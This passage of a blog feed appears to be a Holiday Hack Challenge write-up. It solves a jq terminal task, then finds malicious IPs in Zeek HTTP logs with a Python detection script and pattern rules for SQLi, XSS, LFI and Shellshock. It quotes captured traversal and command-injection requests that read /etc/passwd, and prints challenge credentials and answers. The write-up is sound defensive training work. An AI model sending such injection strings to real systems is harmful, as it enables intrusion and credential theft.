&lt;span class="s2">&amp;#34;resp_pkts&amp;#34;&lt;/span>: 949445,
&lt;span class="s2">&amp;#34;resp_ip_bytes&amp;#34;&lt;/span>: &lt;span class="m">56966700&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>To submit the answer execute the &lt;strong>runtoanswer&lt;/strong> command on the terminal:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">elf@3222ffd89de4:~$ runtoanswer
Loading, please wait......
What is the destination IP address with the longes connection duration? 13.107.21.200
Thank you &lt;span class="k">for&lt;/span> your analysis, you are spot-on.
I would have been working on that &lt;span class="k">until&lt;/span> the early dawn.
Now that you know the features of jq,
You&lt;span class="err">&amp;#39;&lt;/span>ll be able to answer other challenges too.
-Wunorse Openslae
Congratulations!
&lt;/code>&lt;/pre>&lt;/div>&lt;h2 id="fixing-the-weather">Fixing the weather&lt;/h2>
&lt;p>So now you can attack the final objective and you also get some encouraging words from the Krampus in the room:&lt;/p>
&lt;blockquote>
&lt;p>But there’s still time! Solve the final challenge in your badge by blocking the bad IPs at srf.elfu.org and save the holiday season!&lt;/p>
&lt;/blockquote>
&lt;p>Go to link:
&lt;a href="https://srf.elfu.org/" target="_blank" rel="noopener">SRF&lt;/a>&lt;/p>
&lt;p>However, you notice that the website needs credentials before you can access it. Luckily, you remember the &lt;strong>Elfscrow&lt;/strong> objective and the pdf document you successfully recovered, in which there was some good clues for how this can be achieved:&lt;/p>
&lt;p>&lt;img src="../images/obj12-srf.png" alt="SRF document">&lt;/p>
&lt;p>Link to the readme file:
&lt;a href="https://srf.elfu.org/README.md" target="_blank" rel="noopener">here&lt;/a> and the credentials inside:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">&lt;span class="c1">#### Logging in:&lt;/span>
You can login using the default admin pass:
&lt;span class="s1">&amp;#39;admin 924158F9522B3744F5FCD4D10FAC4356&amp;#39;&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>After logging in, you can scroll down to see the Firewall section, which is where you will need to enter the IP addresses which you think are malicious, based on your analysis.&lt;/p>
&lt;p>&lt;img src="../images/obj12-firewall.png" alt="SRF document">&lt;/p>
&lt;h2 id="weed-out-the-bad-ips">Weed out the bad IPs!&lt;/h2>
&lt;p>In order to find the list of IP addresses (around 100 or so in total, as pointed out in the objective) you need to download the Zeek logs from
&lt;a href="https://downloads.elfu.org/http.log.gz" target="_blank" rel="noopener">here&lt;/a>, and run your analysis on them. At this point it is worth to go back to Wunorse to see hear his hints for the analysis task:&lt;/p>
&lt;blockquote>
&lt;p>That&amp;rsquo;s got to be the one - thanks!
Hey, you know what? We&amp;rsquo;ve got a crisis here.
You see, Santa&amp;rsquo;s flight route is planned by a complex set of machine learning algorithms which use available weather data.
All the weather stations are reporting severe weather to Santa&amp;rsquo;s Sleigh. I think someone might be forging intentionally false weather data.
I&amp;rsquo;m so flummoxed I can&amp;rsquo;t even remember how to login!
Hmm&amp;hellip; Maybe the Zeek http.log could help us.
I worry about LFI, XSS, and SQLi in the Zeek log - oh my!
And I&amp;rsquo;d be shocked if there weren&amp;rsquo;t some shell stuff in there too.
I&amp;rsquo;ll bet if you pick through, you can find some naughty data from naughty hosts and block it in the firewall.
If you find a log entry that definitely looks bad, try pivoting off other unusual attributes in that entry to find more bad IPs.
The sleigh&amp;rsquo;s machine learning device (SRF) needs most of the malicious IPs blocked in order to calculate a good route.
Try not to block many legitimate weather station IPs as that could also cause route calculation failure.
Remember, when looking at JSON data, jq is the tool for you!&lt;/p>
&lt;/blockquote>
&lt;p>He provides some very useful hints about
&lt;a href="https://highon.coffee/blog/lfi-cheat-sheet/" target="_blank" rel="noopener">LFI&lt;/a>,
&lt;a href="https://labs.detectify.com/2012/11/07/how-to-exploit-an-xss/" target="_blank" rel="noopener">XSS&lt;/a>,
&lt;a href="https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/" target="_blank" rel="noopener">SQLi&lt;/a> and
&lt;a href="https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/" target="_blank" rel="noopener">Shell&lt;/a> exploits. In order to try to uncover the IP addresses that originate such attacks, I wrote a custom python script, which parsed the Zeek logs looking for signs of such exploits. More specifically for each category of exploits I looked for:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">SQLi &amp;gt; presence of &lt;span class="s1">&amp;#39; in uri, username or user_agent fields
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1">XSS &amp;gt; presence of &amp;lt; in uri or host fields
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1">LFI &amp;gt; presence of /passw in uri field
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1">Shell &amp;gt; presence of &amp;#39;&lt;/span>:&lt;span class="p">;&lt;/span>&lt;span class="s1">&amp;#39; or &amp;#39;&lt;/span>&lt;span class="o">}&lt;/span>&lt;span class="p">;&lt;/span>&lt;span class="err">&amp;#39;&lt;/span> in user_agent field
&lt;/code>&lt;/pre>&lt;/div>&lt;p>As an example, if I did a quick and dirty search for LFI exploits via cat and JQ:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">cat http.log &lt;span class="p">|&lt;/span> jq &lt;span class="s1">&amp;#39;.[] | .uri&amp;#39;&lt;/span> &lt;span class="p">|&lt;/span> grep /passw
&lt;span class="s2">&amp;#34;/api/weather?station_id=\&amp;#34;/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/api/weather?station_id=../../../../../../../../../../bin/cat /etc/passwd\\\\x00|&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/api/stations?station_id=|cat /etc/passwd|&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/api/weather?station_id=;cat /etc/passwd&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/password/&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/api/login?id=cat /etc/passwd||&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/api/weather?station_id=`/etc/passwd`&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/api/weather?station_id=/../../../../../../../../../../../etc/passwd&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/gtcatalog/password.inc&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/gtcatalog/password.inc&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/api/login?id=/../../../../../../../../../etc/passwd&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/password-manager-master/beta/index.html&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/api/weather?station_id=/../../../../../../../../etc/passwd&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/api/weather?station_id=/etc/passwd&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/files/passwd.txt&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/scripts/files/passwd.txt&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/guestbook/files/passwd.txt&amp;#34;&lt;/span>
&lt;span class="s2">&amp;#34;/api/login?id=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd&amp;#34;&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Quite easily this search revealed some requests trying to gain access to the &lt;strong>passwd&lt;/strong> file. Next, I took the specified search criteria and implemented them in a python script.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="n">ips_blacklist&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nb">set&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="c1"># collection of IP addresses deemed to be malicious&lt;/span>
&lt;span class="c1"># load the json into logs object&lt;/span>
&lt;span class="n">logs&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">json&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">load&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nb">open&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;http.log&amp;#34;&lt;/span>&lt;span class="p">))&lt;/span>
&lt;span class="c1"># iterate over entries and filter based on identified markers of IoC&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="n">log&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">logs&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;&amp;#39;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;uri&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span> &lt;span class="s2">&amp;#34;&amp;#39;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;username&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span>
&lt;span class="s2">&amp;#34;&amp;#39;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;user_agent&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span> &lt;span class="s2">&amp;#34;&amp;lt;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;uri&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span>
&lt;span class="s2">&amp;#34;&amp;lt;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;host&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span> &lt;span class="s2">&amp;#34;pass&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;uri&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span>
&lt;span class="s2">&amp;#34;:;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;uri&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span> &lt;span class="s2">&amp;#34;};&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;uri&amp;#39;&lt;/span>&lt;span class="p">]):&lt;/span>
&lt;span class="n">ips_blacklist&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">add&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;id.orig_h&amp;#39;&lt;/span>&lt;span class="p">])&lt;/span>
&lt;span class="c1"># print IP blacklist for copy pasting into SRF FW&lt;/span>
&lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;,&amp;#34;&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">join&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">ips_blacklist&lt;/span>&lt;span class="p">))&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This script loops through the Zeek logs and collects &lt;strong>IP_address&lt;/strong> and &lt;strong>user_agent&lt;/strong> values that we deem malicious. At the end it prints the collected IP addresses in a comma-separated manner in one line, which you can copy paste into the Firewall input field on the SRF website, then click Deny and see if you found enough.&lt;/p>
&lt;p>After pasting in the script output and clicking &lt;strong>DENY&lt;/strong> in the SRF firewall, the calculation still failed, most likely because only about 80 or so IP addresses were found via the above script. That seems short of the 100 which was mentioned in the objective. I turn to the hints from Wunorse again and notice this sentence:&lt;/p>
&lt;blockquote>
&lt;p>&lt;strong>If you find a log entry that definitely looks bad, try pivoting off other unusual attributes in that entry to find more bad IPs.&lt;/strong>&lt;/p>
&lt;/blockquote>
&lt;p>As a next step I extended the script and pivoted by looking for additional malicious IP addresses based on known bad &lt;strong>user_agent&lt;/strong> strings. The idea was to loop through the log again, and see if the current entry&amp;rsquo;s &lt;strong>user_agent&lt;/strong> matches any of the known malicious &lt;strong>user_agent&lt;/strong> values in our &lt;strong>ua_blacklist&lt;/strong>.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="n">ips_blacklist&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nb">set&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="c1"># set of IPs found to be malicious&lt;/span>
&lt;span class="n">ua_blacklist&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nb">list&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="c1"># list so that later on we can count items that are added multiple times&lt;/span>
&lt;span class="c1"># ... code removed for brevity&lt;/span>
&lt;span class="c1"># collect new malicious agents that match existing ones but not in ips_blacklist&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="n">log&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">logs&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;user_agent&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">ua_blacklist&lt;/span> &lt;span class="ow">and&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;id.orig_h&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">not&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">ips_blacklist&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="n">ips_blacklist&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">add&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;id.orig_h&amp;#39;&lt;/span>&lt;span class="p">])&lt;/span>
&lt;span class="n">ua_blacklist&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">append&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;user_agent&amp;#39;&lt;/span>&lt;span class="p">])&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This however provided way too many IP addresses, more than &lt;strong>200&lt;/strong>, so it needs to be reduced somehow. For this I decided to create a third list for whitelisting &lt;strong>user_agents&lt;/strong> strings that are found often enough to signal that it may be benign. After fiddling around with the right threshold, I came to the conclusion that if the same &lt;strong>user_agent&lt;/strong> string is found more than &lt;strong>9&lt;/strong> times in the &lt;strong>ua_blacklist&lt;/strong>, then it could be safely added to a whitelist.&lt;/p>
&lt;p>The full python script can be found below and also in this Github
&lt;a href="https://github.com/florianakos/kringlecon-zeeklogs-srf/" target="_blank" rel="noopener">repo&lt;/a>. It prints out 110 IP addresses, which is more or less close to 100, and more importantly is an accepted solution on the SRF Firewall.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="kn">import&lt;/span> &lt;span class="nn">json&lt;/span>
&lt;span class="n">ips_blacklist&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nb">set&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="c1"># set of IPs found to be malicious&lt;/span>
&lt;span class="n">ua_blacklist&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nb">list&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="c1"># list so that later on we can count items that are added multiple times&lt;/span>
&lt;span class="n">ua_whitelist&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nb">set&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="c1"># set of user_agents that are found to be benign&lt;/span>
&lt;span class="c1"># load the json into logs object&lt;/span>
&lt;span class="n">logs&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">json&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">load&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nb">open&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;http.log&amp;#34;&lt;/span>&lt;span class="p">))&lt;/span>
&lt;span class="c1"># iterate over entries and filter based on identified markers of IoC&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="n">log&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">logs&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;&amp;#39;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;uri&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span> &lt;span class="s2">&amp;#34;&amp;#39;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;username&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span>
&lt;span class="s2">&amp;#34;&amp;#39;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;user_agent&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span> &lt;span class="s2">&amp;#34;&amp;lt;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;uri&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span>
&lt;span class="s2">&amp;#34;&amp;lt;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;host&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span> &lt;span class="s2">&amp;#34;pass&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;uri&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span>
&lt;span class="s2">&amp;#34;:;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;uri&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span> &lt;span class="s2">&amp;#34;};&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;uri&amp;#39;&lt;/span>&lt;span class="p">]):&lt;/span>
&lt;span class="n">ips_blacklist&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">add&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;id.orig_h&amp;#39;&lt;/span>&lt;span class="p">])&lt;/span>
&lt;span class="n">ua_blacklist&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">append&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;user_agent&amp;#39;&lt;/span>&lt;span class="p">])&lt;/span>
&lt;span class="c1"># collect new malicious agents that match existing ones but not in ips_blacklist&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="n">log&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">logs&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;user_agent&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">ua_blacklist&lt;/span> &lt;span class="ow">and&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;id.orig_h&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">not&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">ips_blacklist&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="n">ua_blacklist&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">append&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;user_agent&amp;#39;&lt;/span>&lt;span class="p">])&lt;/span>
&lt;span class="c1"># identifiy agents that are found more than 9 times &amp;gt; those should be benign and can be whitelisted&lt;/span>
&lt;span class="n">ua_blacklist_counts&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="p">{&lt;/span> &lt;span class="n">x&lt;/span> &lt;span class="p">:&lt;/span> &lt;span class="n">ua_blacklist&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">count&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">x&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="k">for&lt;/span> &lt;span class="n">x&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">ua_blacklist&lt;/span> &lt;span class="p">}&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="n">i&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">ua_blacklist_counts&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="n">ua_blacklist_counts&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">i&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">&amp;gt;=&lt;/span> &lt;span class="mi">9&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="n">ua_whitelist&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">add&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">i&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="c1"># identify additional IPs that are in ua_blacklist and not in ua_whitelist&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="n">log&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">logs&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;user_agent&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">ua_blacklist&lt;/span> &lt;span class="ow">and&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;user_agent&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">not&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">ua_whitelist&lt;/span> &lt;span class="ow">and&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;id.orig_h&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">not&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">ips_blacklist&lt;/span> &lt;span class="p">:&lt;/span>
&lt;span class="n">ips_blacklist&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">add&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;id.orig_h&amp;#39;&lt;/span>&lt;span class="p">])&lt;/span>
&lt;span class="c1"># print out comma separated string for pastin into srf.elfu.org firewall for DENY&lt;/span>
&lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;,&amp;#34;&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">join&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">ips_blacklist&lt;/span>&lt;span class="p">))&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Output list of IP addresses that are most likely poisoning the weather API:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">229.133.163.235,132.45.187.177,65.153.114.120,22.34.153.164,187.152.203.243,231.179.108.238,220.132.33.81,52.39.201.107,87.195.80.126,118.26.57.38,194.143.151.224,111.81.145.191,42.103.246.250,150.45.133.97,1.185.21.112,79.198.89.109,45.239.232.245,249.90.116.138,250.22.86.40,169.242.54.5,253.65.40.39,34.129.179.28,66.116.147.181,121.7.186.163,44.164.136.41,150.50.77.238,106.93.213.219,81.14.204.154,2.240.116.254,50.154.111.0,92.213.148.0,0.216.249.31,29.0.183.220,53.160.218.44,254.140.181.172,140.60.154.239,102.143.16.184,13.39.153.254,83.0.8.119,34.155.174.167,118.196.230.170,135.203.243.43,49.161.8.58,25.80.197.172,126.102.12.53,2.230.60.70,69.221.145.150,131.186.145.73,84.185.44.166,238.143.78.114,168.66.108.62,27.88.56.114,19.235.69.221,42.127.244.30,37.216.249.50,97.220.93.190,211.229.3.254,80.244.147.207,193.228.194.36,226.102.56.13,33.132.98.193,227.110.45.126,61.110.82.125,230.246.50.221,28.169.41.122,158.171.84.209,75.73.228.192,203.68.29.5,226.240.188.154,249.237.77.152,173.37.160.150,180.57.20.247,42.103.246.130,103.235.93.133,68.115.251.76,9.206.212.33,75.215.214.65,186.28.46.179,187.178.169.123,142.128.135.10,42.191.112.181,148.146.134.52,84.147.231.129,95.166.116.45,123.127.233.97,31.116.232.143,229.229.189.246,44.74.106.131,135.32.99.116,217.132.156.225,42.16.149.112,223.149.180.133,252.122.243.212,249.34.9.16,185.19.7.133,116.116.98.205,250.51.219.47,106.132.195.153,10.155.246.29,56.5.47.137,104.179.109.113,23.49.177.78,48.66.193.176,225.191.220.138,10.122.158.57,253.182.102.55,200.75.228.240,190.245.228.38,233.74.78.199,129.121.121.48
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Once you submit this string and hit Deny, the calculator will start running and provide you with the RID that you need to submit for solving the final Objective.&lt;/p>
&lt;p>&lt;img src="../images/obj12-solution.png" alt="SRF solved">&lt;/p>
&lt;p>RID: &lt;strong>0807198508261964&lt;/strong>&lt;/p>
&lt;h2 id="the-bell-tower">The Bell Tower&lt;/h2>
&lt;p>Once you submit the RID through your personal badge, you get access to The Bell Tower through the door that just opened in the Sleigh Shop. Go up and talk to the fellas for finishing this once and for all!&lt;/p>
&lt;p>&lt;img src="../images/obj12-belltower.png" alt="SRF solved">&lt;/p>
&lt;p>Santa seems quite grateful and happy:&lt;/p>
&lt;blockquote>
&lt;p>You did it! Thank you! You uncovered the sinister plot to destroy the holiday season!
Through your diligent efforts, we’ve brought the Tooth Fairy to justice and saved the holidays!
Ho Ho Ho!
The more I laugh, the more I fill with glee.
And the more the glee,
The more I&amp;rsquo;m a merrier me!
Merry Christmas and Happy Holidays.&lt;/p>
&lt;/blockquote>
&lt;p>Next you get some good news from Krampus:&lt;/p>
&lt;blockquote>
&lt;p>Congratulations on a job well done!
Oh, by the way, I won the Frido Sleigh contest.
I got 31.8% of the prizes, though I&amp;rsquo;ll have to figure that out.&lt;/p>
&lt;/blockquote>
&lt;p>Let&amp;rsquo;s hope he will share with others, his lifetime supply of cookiez&amp;hellip; :) However, quite understandably, The Tooth Fairy is not as jolly as the Krampus:&lt;/p>
&lt;blockquote>
&lt;p>You foiled my dastardly plan! I’m ruined! And I would have gotten away with it too, if it weren&amp;rsquo;t for you meddling kids!&lt;/p>
&lt;/blockquote>
&lt;p>Whats more, there is a suspicious note in the corner which seems to suggest we probably cannot rest for too long, before the villains return and try to ruin the holiday once again&amp;hellip;&lt;/p>
&lt;p>&lt;img src="../images/obj12-note.png" alt="SRF solved">&lt;/p></description></item><item><title>Cloud Security Automation</title><link>https://flrnks.netlify.app/post/sans-sec540/</link><pubDate>Thu, 26 Nov 2020 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/sans-sec540/</guid><description>&lt;p>In November 2020 I was lucky to have had the chance to take part in my 2nd SANS course of the year: &lt;strong>SEC540 - Cloud Security and DevOps Automation -&lt;/strong> as part of the
&lt;a href="https://www.sans.org/event/amsterdam-november-2020-live-online" target="_blank" rel="noopener">SANS Amsterdam&lt;/a>. Unlike the first one, this was conducted in a remote-only format that they call &lt;strong>LiveOnline&lt;/strong>. I liked it so much that I wanted to share it. If interested, you can read more about my experience of &lt;strong>SEC530 - Defensible Security Architecture -&lt;/strong> in
&lt;a href="https://flrnks.netlify.app/post/sans-sec530">this post&lt;/a> which was an on-site/in-person course as part of the
